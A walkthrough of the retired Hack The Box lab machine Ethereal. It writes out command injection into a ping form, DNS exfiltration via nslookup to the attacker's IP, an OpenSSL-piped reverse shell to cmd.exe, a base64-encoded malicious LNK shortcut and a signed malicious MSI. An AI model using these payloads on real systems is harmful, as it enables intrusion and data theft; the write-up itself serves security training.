This post documents the complete walkthrough of Ethereal, a retired vulnerable VM created by egre55 and MinatoTW, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Ethereal is a retired vulnerable VM from Hack The Box.
Let’s start with a
masscan probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.106 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-02-18 02:01:47 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.106 Discovered open port 8080/tcp on 10.10.10.106 Discovered open port 21/tcp on 10.10.10.106
masscan finds three open ports. Let’s do one better with
nmap scanning the discovered ports.
# nmap -n -v -Pn -p21,80,8080 -A --reason -oN nmap.txt 10.10.10.106 ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106 | ftp-syst: |_ SYST: Windows_NT 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ethereal 8080/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request
Since FTP allows anonymous login, let’s start with that first. Long story short, the only usable piece of information lies in
The file contains a FAT filesystem that we can mount like so.
pbox contains a MS-DOS executable
PBOX.EXE, i.e. PasswordBox program.
We can use DOSBox to open it. We’ll mount directory
When you try to run
PBOX.EXE, DOSBox will complain that there’s no DPMI (DOS Protected Mode Interface). We can enable DPMI through CWSDPMI, a DPMI host that allows DOS programs to run in protected mode.
CWSDPMI.exe in the same location as
PBOX.EXE and we are good to go.
The master password is
password, which I got it on my first attempt.
To make things easier for copying, you can also run
PBOX.EXE with the
--dump switch. This switch will dump all the credentials onto standard output.
Internet Information Services (IIS)
Now, let’s turn our attention to the
8080/tcp. This is how
80/tcp looks like.
Very nice! Anyways, the key to the next clue lies here.
See where it links to?
It’ll be wise to add
/etc/hosts because this is what you get if you have not done so.
And this is what you get otherwise.
Recall the credentials we collected earlier? Turns out that (
alan:!C414m17y57r1k3s4g41n!) is the right combination to login for the Basic Authentication scheme.
This is how it looks like after logging in.
This form allows one to send exactly two ICMP echo request messages to an external IP address. Here’s me using the form to send the request to my own IP address.
I had a
tcpdump session to capture ICMP traffic.
The form must have been implemented with the following Windows command:
ping -n2 <ip_address>
As such, I’m able to execute remote command by prepending a single ampersand character (
&). This allows the form to execute my command regardless of whether the
ping was successfully executed or not.
Now, let’s see if the box allows DNS queries. I’m using
dnschef to set up a fake DNS server that only has one answer to all the queries.
# dnschef --fakeip=10.10.10.106 -i 10.10.13.92 --logfile=exfil
Meanwhile, I have another terminal windows to display just the query.
# tail -f exfil | grep --line-buffered cooking | cut -d' ' -f11
This is the test.
If the test is successful, I should see
this.is.a.test on the log.
Awesome. I can exfiltrate data through DNS!
Building on the above insights, these are some of the commands I came up with to exfiltrate enumeration results from the box.
Show current hostname and user
& for /f "usebackq tokens=1,2 delims=\" %i in (`whoami`) do nslookup %i_%j 10.10.13.92
List world-writable directory in %PUBLIC%
& for /f "usebackq tokens=1-10* delims=\" %i in (`dir /a-rd /s /b %PUBLIC%`) do nslookup %i_%j_%k_%l_%m 10.10.13.92
List files in a directory—C:\Program Files (x86)\
& for /f "usebackq tokens=*" %i in (`dir /b c:\progra~2`) do nslookup %i 10.10.13.92
Redirect command output to a file in a world-writable directory
& netsh advfirewall firewall show rule name=all dir=out verbose > c:\users\public\desktop\shortcuts\fw.txt
Check if file/directory exists
& if exist c:\users\public\desktop\shortcuts (nslookup yes 10.10.13.92) else (nolookup no 10.10.13.92)
Display outbound firewall rules
& for /f "eol=- skip=100 tokens=1-10*" %i in (c:\users\public\desktop\shortcuts\fw.txt) do nslookup %i_%j_%k_%l_%m_%o_%p_%q 10.10.13.92
Check access control list of files/directories
& for /f "tokens=1-10*" %i in ('icacls c:\users\public\desktop\shortcuts') do nslookup %i_%j_%k_%l_%m_%o_%p_%q 10.10.13.92
Running the command to display outbound firewall rules reveals the following:
Rule Name: Allow ICMP Request Enabled: Yes Direction: Out Profiles: Domain,Private,Public Grouping: LocalIP: Any RemoteIP: Any Protocol: ICMPv4 Type Code 8 Any Edge traversal: No InterfaceTypes: Any Security: NotRequired Rule source: Local Setting Action: Allow Rule Name: Allow UDP Port Enabled: Yes Direction: Out Profiles: Domain,Private,Public Grouping: LocalIP: Any RemoteIP: Any Protocol: UDP LocalPort: Any RemotePort: 53 Edge traversal: No InterfaceTypes: Any Security: NotRequired Rule source: Local Setting Action: Allow Rule Name: Allow TCP Ports 136 Enabled: Yes Direction: Out Profiles: Domain,Private,Public Grouping: LocalIP: Any RemoteIP: Any Protocol: TCP LocalPort: Any RemotePort: 73,136 Edge traversal: No InterfaceTypes: Any Security: NotRequired Rule source: Local Setting Action: Allow Rule Name: Allow ICMP Reply Enabled: Yes Direction: Out Profiles: Domain,Private,Public Grouping: LocalIP: Any RemoteIP: Any Protocol: ICMPv4 Type Code 0 Any Edge traversal: No InterfaceTypes: Any Security: NotRequired Rule source: Local Setting Action: Allow
Running the command to list files in a directory—C:\Program Files (x86) revealed the pressence of OpenSSL.
Microsoft.NET MSBuild OpenSSL-v1.1.0 WindowsPowerShell
Going deeper into the OpenSSL directory reveals the
Remote Command Execution
We have two TCP ports allowed for outbound communications and there’s OpenSSL available. Perhaps we can create an encrypted tunnel for shuttling data back and forth between the box and my attacking machine?
Let’s give it a shot using the following command on the form.
& c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.13.92:73 | cmd.exe /k /q | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.13.92:136
We need to set up two SSL servers listening at
136/tcp on my attacking machine, one for
echoing commands to
cmd.exe, the other for displaying output from
cmd.exe, respectively. I’m sure you get the idea.
But first, we need a self-signed certificate for the SSL server. Here’s the command to generate a self-signed certificate using
# openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
Now, launch the two SSL servers like so.
# openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < cmd # openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Send the commands in
cmd to the SSL server at
73/tcp. The moment the form connects to it, the commands is echoed to
cmd.exe and the output from
cmd.exe is piped to
Here are the commands in
cmd I want to run at the box.
Here comes the moment of truth…
And, we have remote command execution! Although we have remote command execution, it feels like submitting instructions in a punched card. Nostalgic but painful.
During enumeration of
alan’s account, I notice a note on his desktop.
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead. - Alan
If I had to guess, I would say that I need to create a malicious shortcut (LNK) file and replace the VS shortcut with it. And a scheduled task would be running the shortcut as another user. To create the shortcut, I can use LNKUp to generate a Windows shortcut that will execute a command when run.
# python generate.py --host localhost --out evil.lnk --execute 'c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.13.92:73 | cmd.exe /k /q | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.13.92:136' --type ntlm \ ~==================================================~ ## ## ## /$$ /$$ /$$ /$$ /$$ /$$ /$$ ## ## | $$ | $$$ | $$| $$ /$$/| $$ | $$ ## ## | $$ | $$$$| $$| $$ /$$/ | $$ | $$ /$$$$$$ ## ## | $$ | $$ $$ $$| $$$$$/ | $$ | $$ /$$__ $$ ## ## | $$ | $$ $$$$| $$ $$ | $$ | $$| $$ \ $$ ## ## | $$ | $$\ $$$| $$\ $$ | $$ | $$| $$ | $$ ## ## | $$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$/| $$$$$$$/ ## ## |________/|__/ \__/|__/ \__/ \______/ | $$____/ ## ## | $$ ## ## | $$ ## ## |__/ ## ~==================================================~ File saved to /root/Downloads/repo/LNKUp/evil.lnk Link created at evil.lnk with UNC path \\localhost\Share\44170.ico. # base64 -w0 evil.lnk TAAAAAEUAgAAAAAAwAAAAAAAAEZhAAAAAAAAAABnnmOvytQBAGeeY6/K1AEAZ55jr8rUAQAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAOcAFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAAAAAAAAAAAAAAPAAxAAAAAABWTs5oEABXaW5kb3dzACYAAwAEAO++Vk7OaFZOzmgUAAAAVwBpAG4AZABvAHcAcwAAABYAQAAxAAAAAABWTs5oEABTeXN0ZW0zMgAAKAADAAQA775WTs5oVk7OaBQAAABTAHkAcwB0AGUAbQAzADIAAAAYADwAMgAAKgQAVk7OaBAAY21kLmV4ZQAmAAMABADvvlZOzmhWTs5oFAAAAGMAbQBkAC4AZQB4AGUAAAAWAAAAuwAvYyBjOlxwcm9ncmF+MlxvcGVuc3NsLXYxLjEuMFxiaW5cb3BlbnNzbC5leGUgc19jbGllbnQgLXF1aWV0IC1jb25uZWN0IDEwLjEwLjEzLjkyOjczIHwgY21kLmV4ZSAvayAvcSB8IGM6XHByb2dyYX4yXG9wZW5zc2wtdjEuMS4wXGJpblxvcGVuc3NsLmV4ZSBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTAuMTAuMTMuOTI6MTM2GwBcXGxvY2FsaG9zdFxTaGFyZVw0NDE3MC5pY28AAAAA
Now, how do I transfer the LNK file over to the box? I can
base64-encoded string of the LNK file and redirect/write it to
C:\Users\Public\Desktop\Shortcuts on the form like so.
& echo TAAAAAEU...Y28AAAAA > c:\users\public\desktop\shortcuts\evil.lnk.b64
The next task would be to base64-decode it back to the LNK file. How do I do that?
cmd now looks like this.
cd c:\users\public\desktop\shortcuts c:\progra~2\openssl-v1.1.0\bin\openssl.exe base64 -A -d -in evil.lnk.b64 -out "Visual Studio 2017.lnk" type "Visual Studio 2017.lnk"
A while later, this appears…
jorge is the one double-clicking the shortcut! I see…I need to repeat the steps of echoing commands to the SSL server listening at
73/tcp, with one exception. I can’t control when the commands get executed because we’ll have to wait for
jorge to double-click the shortcut.
During enumeration of
jorge’s account, I found
user.txt at the desktop.
I also found out that there are two mounted volumes in the box.
Further enumeration of D: drive reveals another note at
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already. - Rupal
What now? Create malicious signed MSI? Challenge accepted.
I’m using WiX Toolset to create the malicious MSI, and
signtool from Windows SDK to sign it. Having said that, the instructions to install and configure them is beyond the scope of this walkthrough. I’ll leave you with an exercise to extract the CA certificate and private key from
D:\Certs. Hint: use
The WiX Toolset allows one to create MSI file using WiX file, an XML document describing the MSI file. Here’s the WIX file I’m using.
<?xml version="1.0"?> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi"> <Product Id="*" UpgradeCode="ABCDDCBA-7349-453F-94F6-BCB5110BA4FD" Name="Foobar 1.0" Version="0.0.1" Manufacturer="Acme Ltd." Language="1033"> <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/> <Media Id="1" Cabinet="foobar.cab" EmbedCab="yes"/> <Directory Id="TARGETDIR" Name="SourceDir"> <Directory Id="ProgramFilesFolder"> <Directory Id="INSTALLLOCATION" Name="foobar"> <Component Id="foobar" Guid="ABCDDCBA-83F1-4F22-985B-FDB3C8ABD471"> <File Id="foobar" Source="foobar.exe"/> </Component> </Directory> </Directory> </Directory> <Feature Id="DefaultFeature" Level="1"> <ComponentRef Id="foobar"/> </Feature> <CustomAction Id="Root" Directory="TARGETDIR" ExeCommand="cmd.exe /c type c:\users\rupal\desktop\root.txt > c:\users\public\desktop\shortcuts\success.txt" Execute="deferred" Impersonate="yes" Return="ignore"/> <InstallExecuteSequence> <Custom Action="Root" After="InstallInitialize"></Custom> </InstallExecuteSequence> </Product> </Wix>
Upon running the MSI file as administrator, we’ll redirect
success.txt, and place it a location where everyone has access.
But before we compile the WiX file to MSI, we need to issue a software publisher certificate (SPC), i.e. the code signing certificate.
Run the following commands to generate the SPC.
makecert.exe will prompt you for a password to protect the generated private key. You’ll see something like this. Use any password you like.
We can now proceed to create the MSI file with a candlelight dinner, first with
Finally, we sign the MSI file with our newly minted SPC.
evil.msi to the box. On our attacking machine, run the following command.
# openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < evil.msi
On the form, run the following command.
& c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.13.92:73 > c:\users\public\desktop\shortcuts\evil.msi
Note: You may need to do this a couple of times. I encountered truncation of the file. It was painful…
Now, I have
jorge execute the following commands.
cd c:\users\public\desktop\shortcuts copy /y evil.msi d:\DEV\MSIs d: cd d:\DEV\MSIs dir
Upon dropping the MSI file at
D:\DEV\MSIs, I got
root.txt moments later, courtesy of Rupal.